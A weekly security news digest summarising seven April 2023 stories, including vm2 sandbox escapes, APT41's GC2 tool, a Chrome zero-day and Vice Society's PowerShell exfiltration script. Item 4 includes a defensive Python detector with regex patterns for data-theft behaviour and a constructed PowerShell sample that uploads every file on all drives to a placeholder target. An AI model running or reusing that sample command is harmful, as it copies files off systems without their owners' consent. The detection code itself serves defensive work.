Programmer’s Digest #28

04/13/2023-04/19/2023 Critical Flaws in vm2 JavaScript Library, APT41’s Use of Open Source GC2 Tool, Kodi Confirms Data Breach And More

1. Critical Flaws in vm2 JavaScript Library Can Lead to Remote Code Execution 

A fresh round of patches has been made available for the vm2 JavaScript library to address two critical flaws that could be exploited to break out of the sandbox protections. Both flaws, CVE-2023-29199 and CVE-2023-30547, are rated 9.8 out of 10 on the CVSS scoring system and have been addressed in versions 3.9.16 and 3.9.17, respectively. Successful exploitation of the bugs, which allow an attacker to raise an unsanitized host exception, could be weaponized to escape the sandbox and run arbitrary code in the host context. The disclosure comes a little over a week after vm2 remediated another sandbox escape flaw (CVE-2023-29017, CVSS score: 9.8) that could lead to the execution of arbitrary code on the underlying system.

2. Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites

A Chinese nation-state group targeted an unnamed Taiwanese media organization to deliver an open source red teaming tool known as Google Command and Control (GC2) amid broader abuse of Google’s infrastructure for malicious ends. The tech giant’s Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geological and geographical-themed moniker HOODOO. The starting point of the attack is a phishing email that contains links to a password-protected file hosted on Google Drive, which, in turn, incorporates the Go-based GC2 tool to read commands from Google Sheets and exfiltrate data using the cloud storage service. After installation on the victim machine, the malware queries Google Sheets to obtain attacker commands. In addition to exfiltration via Drive, GC2 enables the attacker to download additional files from Drive onto the victim system.

3. Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year. Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. The tech giant acknowledged that “an exploit for CVE-2023-2033 exists in the wild,” but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.

Recommendation
Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

4. Vice Society Ransomware Using Stealthy PowerShell Tool for Data Exfiltration

Threat actors associated with the Vice Society ransomware gang have been observed using a bespoke PowerShell-based tool to fly under the radar and automate the process of exfiltrating data from compromised networks. Threat actors (TAs) using built-in data exfiltration methods like living-off-the-land binaries and scripts negate the need to bring in external tools that might be flagged by security software and/or human-based security detection mechanisms. These methods can also hide within the general operating environment, providing subversion to the threat actor. The PowerShell script discovered by Unit 42 (w1.ps1) works by identifying mounted drives on the system, and then recursively searching through each of the root directories to facilitate data exfiltration over HTTP. The tool also makes use of exclusion criteria to filter out system files, backups, and folders pointing to web browsers as well as security solutions from Symantec, ESET, and Sophos. The discovery of the data exfiltration script illustrates the ongoing threat of double extortion in the ransomware landscape. It also serves as a reminder for organizations to prioritize robust security protections and stay vigilant against evolving threats.
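As an added defender-side illustration (not part of the digest or of Unit 42's analysis), the following Python snippet scores PowerShell Script Block Logging text against the behaviours described above: drive enumeration, recursive directory walks, HTTP uploads, and exclusion of security-vendor folders. The regex patterns and the sample script blocks are constructed assumptions about how such behaviour typically appears in logs, not indicators taken from the real w1.ps1.

```python
import re
from typing import Dict, List, Set

# Behaviours of the described script expressed as indicator categories.
# The patterns are assumptions about common PowerShell idioms, not
# signatures derived from the actual sample.
INDICATORS: Dict[str, re.Pattern] = {
    "drive_enum": re.compile(r"Get-PSDrive|Win32_LogicalDisk|\[System\.IO\.DriveInfo\]", re.I),
    "recursive_walk": re.compile(r"Get-ChildItem\b[^\n]*-Recurse|\[System\.IO\.Directory\]::EnumerateFiles", re.I),
    "http_upload": re.compile(r"Invoke-(WebRequest|RestMethod)\b[^\n]*-Method\s+Post|\.UploadFile\(|\.UploadData\(", re.I),
    # Only count vendor names when they appear in an exclusion filter.
    "av_folder_exclusion": re.compile(r"(-notmatch|-notlike|-Exclude)[^\n]*(Symantec|ESET|Sophos)", re.I),
}

def score_script_block(text: str) -> Set[str]:
    """Return the set of indicator categories matched by one script block."""
    return {name for name, pat in INDICATORS.items() if pat.search(text)}

def is_suspicious(text: str, min_hits: int = 3) -> bool:
    """Flag a block when several exfiltration behaviours co-occur.
    Any single indicator is common in admin scripts; the combination is not."""
    return len(score_script_block(text)) >= min_hits

# Constructed sample script blocks (Event ID 4104 style text, not real samples).
SAMPLES: Dict[str, str] = {
    "benign_inventory": "Get-PSDrive -PSProvider FileSystem | Select Name, Used, Free",
    "benign_backup": "Get-ChildItem C:\\Data -Recurse | Compress-Archive -DestinationPath D:\\backup.zip",
    "exfil_like": (
        "$drives = Get-PSDrive -PSProvider FileSystem\n"
        "foreach ($d in $drives) { Get-ChildItem $d.Root -Recurse -File |\n"
        "  Where-Object { $_.FullName -notmatch 'Symantec|ESET|Sophos' } |\n"
        "  ForEach-Object { Invoke-WebRequest -Uri $target -Method Post -InFile $_.FullName } }"
    ),
}

def triage(samples: Dict[str, str]) -> List[str]:
    """Return the names of sample blocks that should be escalated for review."""
    return [name for name, text in samples.items() if is_suspicious(text)]

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: {sorted(score_script_block(text))}")
    print("escalate:", triage(SAMPLES))
```

Tuning the threshold and patterns to a given estate's baseline is what makes this useful; the point is that the co-occurrence of ordinary cmdlets, not any one of them, is the signal.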

5. Kodi Confirms Data Breach: 400K User Records and Private Messages Stolen

Kodi, an open source media player software provider, has confirmed a data breach after a cyber attack. Threat actors stole user data and private messages from the company’s MyBB forum database, and attempted to sell the data dump to a cybercrime marketplace. They also created database backups, which were downloaded and deleted. The account used by the threat actors has been disabled, and Kodi has taken down its forum while commissioning a new server. The company emphasized that there is no evidence of unauthorized access to the server hosting the MyBB software. The breach affected 400,635 users, whose forum posts, messages, and personal information were compromised. Kodi plans to redeploy the forum on the latest version of the MyBB software.

6. New Python-Based “Legion” Hacking Tool Emerges on Telegram

Legion, a Python-based credential harvester and hacking tool, is being marketed on Telegram as a way for cybercriminals to break into various online services for further exploitation. The malware includes modules to exploit unpatched versions of Apache, conduct remote code execution attacks, and brute-force cPanel and WebHost Manager accounts. It is designed to exploit web servers running content management systems, PHP, or PHP-based frameworks like Laravel. The primary goal is to hijack the services and weaponize the infrastructure for follow-on attacks, including mass spam and opportunistic phishing campaigns. Legion also retrieves AWS credentials from insecure or misconfigured web servers and delivers SMS spam messages to users of US mobile networks. The origins of the threat actor remain unknown.

7. Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog due to active exploitation. The first vulnerability (CVE-2023-20963) is an Android Framework Privilege Escalation Vulnerability with a CVSS score of 7.8. Google has acknowledged that the vulnerability may be under limited, targeted exploitation. The second vulnerability (CVE-2023-29492) is an insecure deserialization vulnerability in Novi Survey software that allows attackers to execute code on the server remotely. The vulnerability was addressed by the software provider earlier this week. The development follows reports that Android apps from Chinese e-commerce company Pinduoduo were weaponized as a zero-day to steal data and control devices, exploiting the Android Framework Privilege Escalation Vulnerability. Google suspended Pinduoduo’s official app from the Play Store in March due to malware identified in off-Play versions of the software.
